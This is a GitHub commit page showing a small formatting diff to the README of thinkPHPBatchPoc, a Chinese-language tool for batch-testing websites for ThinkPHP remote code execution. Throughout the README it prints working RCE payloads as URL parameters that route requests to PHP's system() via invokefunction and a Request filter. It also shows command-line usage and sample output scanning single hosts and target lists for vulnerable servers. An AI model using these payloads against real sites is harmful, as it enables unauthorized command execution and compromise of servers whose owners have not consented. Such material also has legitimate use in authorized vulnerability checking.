Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
admintony committed Dec 13, 2018
1 parent f515d30 commit 9c786c2
Showing 1 changed file with 6 additions and 6 deletions.
12 changes: 6 additions & 6 deletions README.md
Expand Up @@ -4,7 +4,7 @@ thinkPHPBatchPoc 是thinkPHP代码执行批量检测工具

## 工具所使用的payload

```php
```
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
?s=index/\think\Request/input&filter=system&data=echo%20www_admintony_com
Expand All @@ -18,7 +18,7 @@ thinkPHPBatchPoc 是thinkPHP代码执行批量检测工具

# 工具使用方法

```php
```
PS E:\PyProject> python .\thinkPHPBatchPoc.py
thinkPHPBatchPoc
Author: Admintony @ 2018.12.13
Expand All @@ -32,15 +32,15 @@ thinkPHPBatchPoc.py -u target_URL # 指定检测是否存在thinkPHP代码执行

## 针对单个目标进行测试

```php
```
PS E:\PyProject> python .\thinkPHPBatchPoc.py -u admintony.com
[+] http://admintony.com is vulnerable
[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
```

## 批量测试

```php
```
PS E:\PyProject> python .\thinkPHPBatchPoc.py -f .\target.txt
[+]Testing http://www.admintony.com
[-] http://www.admintony.com is not vulnerable
Expand All @@ -53,6 +53,6 @@ PS E:\PyProject> python .\thinkPHPBatchPoc.py -f .\target.txt
[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
```

# 下载地址
# 博客地址

[thinkPHPBatchPoc](http://github.com/thinkPHPBatchPoc)
[thinkPHPBatchPoc](http://www.admintony.com/thinkPHPBatchPoc.html)

0 comments on commit 9c786c2

Please sign in to comment.